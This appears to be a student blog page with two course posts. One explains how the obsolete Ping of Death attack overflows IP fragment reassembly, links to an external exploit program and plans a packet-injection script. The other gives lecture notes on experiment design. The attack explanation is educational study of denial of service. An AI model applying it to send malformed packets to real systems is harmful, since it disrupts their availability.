Categories
Reading Unit - DoS Research

FIT5108 – DoS Reading Unit Part 3

This week I will start a detailed review of each of the attack methods introduced in Week 1’s post. I will start with on of the oldest DoS attacks, the Ping of Death.

I incorrectly listed this under ICMP attacks in a previous post, the ping of death actually exploits the process of IP packet reassembly.

The disassembly and reassembly process of data communication

We can see above that after being received via the communication medium (ie: cat6 cable), the ethernet packets are unwrapped and we find an IP packets. The maximum size of an IP packet according to the standard specification (http://tools.ietf.org/html/rfc791) is 65,535 bytes. The maximum size of a standard ethernet frame (http://standards.ieee.org/about/get/802/802.3.html) is 1500 bytes. So this means that IP packets must be split across multiple Ethernet frames and the receiver must reassemble them. To keep track of reassembly the IP fragments have an fragment offset field.

The fragment offset says, “I start with the 1000th byte of the complete IP packet, put me after the 999th byte. Now considering the fact that the ethenet protocol allows frames of upto 1500bytes, the IP protocol would not allow an IP fragment to say I am the 65,000th byte put me there. As above the maximum IP packet is 65,535 bytes. However, the IP protocol actually allows an IP fragment to say I am the 65,528th byte!

So, if an attacker send an IP packet that was the allowable size of  65,535 bytes, it will be broken up into Ethernet frames (Ethernet is the most common Datalink protocol). A ping of death occurs when the attacker modifies the the last IP fragment to I am the 65,528th byte but add more that 8 bytes of subsequent data. The receiver will now try to reassemble an IP packet that exceeds 65,535 byte limit.

Due to the fact that data communications and packet assembly must be very fast in older operating systems there were no checks done to ensure the reassembled IP packet did not exceed the memory allocated for it. This would result in a buffer overflow and the crash or bugging of the system.

On any post 1998 systems a check is completed to ensure the sum of Fragment Offset and Total Length field on an IP fragment do not exceed 65,535 bytes. This is obviously an old, now mostly non-exploitable attack but it is worth reviewing to see the type of exploits that have existed in the past as they will provide some insight into future vulnerabilities.

A program written in C by Bill Fenner implementing a ping of death using ICMP can be found here: http://insecure.org/sploits/ping-o-death.html.

Any program implementing a ping of death attack must be able to inject modified packets/frames to a network interface. This is also required in a number of other DoS attacks so I will look at doing a basic script in Python using the PyCap Library: http://pycap.sourceforge.net/. Although it does require Python 2.3 :(.

Categories
IT Research Methods

FIT5185 – IT Research Methods Week 3

Experiments was the topic of week 3’s lecture presented by David Arnott. We started with a classification of scientific investigation:

  • Descriptive studies
  • Correlation studies
  • Experiments

Importantly the anchor of these investigations is the research question.

Terms and concepts was the next sub-section:

  •  Subject (Participant by law in Aus where people are subjects) – The target of your experimentation
  • Variables (Independent variables, Dependent variables, Intermediate variables, Extraneous variables), these are self explanatory via dictionary definitions.
  • Variance/Factor  models – Aims to predict outcome from adjustment of predictor (independent?) variables, in an atomic time frame. That is my loose interpretation.
  • Process model -Aims to explain how outcomes develop over time (The difference between variance and process models appears to be moot and I feel somewhat irrelevant).
  • Groups -> experimentation group, control group -> ensuring group equivalence.
  • Hypothesis – Prediction about the effect of independent variable manipulation on dependent variables. One tailed, two tailed,  null hypothesis.
  • Significance – the difference between two descriptive statistics, to an extend which cannot be chance.
  • Reliability – Can the research method be replicated by another researcher
  • Internal Validity – How much is the manipulation of the independent variable responsible for the results in the dependent variable.
  • External validity – Can the results be generalized to entities outside of the experiment
  • Construct validity – extend to which the measures used in the experiment actually measure the construct?

Experimental Design followed:

  • Between-subject design vs Within-subject design -> are subjects manipulated in the same or differing ways.
  • After-only vs Before-after design -> testing of dependent variables at which stages..
  • Statistical tests must reflect the experimental design:

 

Statistical test to reflect the experimental design - Source week 3 lecture notes

When creating an experimental design it seems like a good idea just to make a check list.

The coffee/caffeine example covered next seemed a bit odd as it made the assumption that coffee caffeine are the same things. I recall same type assumption was made in regards to THC and marijuana which was later found to be fundamentally flawed. I did not understand the Decision support system example at all so was not really able to extrapolate much understanding from the two examples covered.